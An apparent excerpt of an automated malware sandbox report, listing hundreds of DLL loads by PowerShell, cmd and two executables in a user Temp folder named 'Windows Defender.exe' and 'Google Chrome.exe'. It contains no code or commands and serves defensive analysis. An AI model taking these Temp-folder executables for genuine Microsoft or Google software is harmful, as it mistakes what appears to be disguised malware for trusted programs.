Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
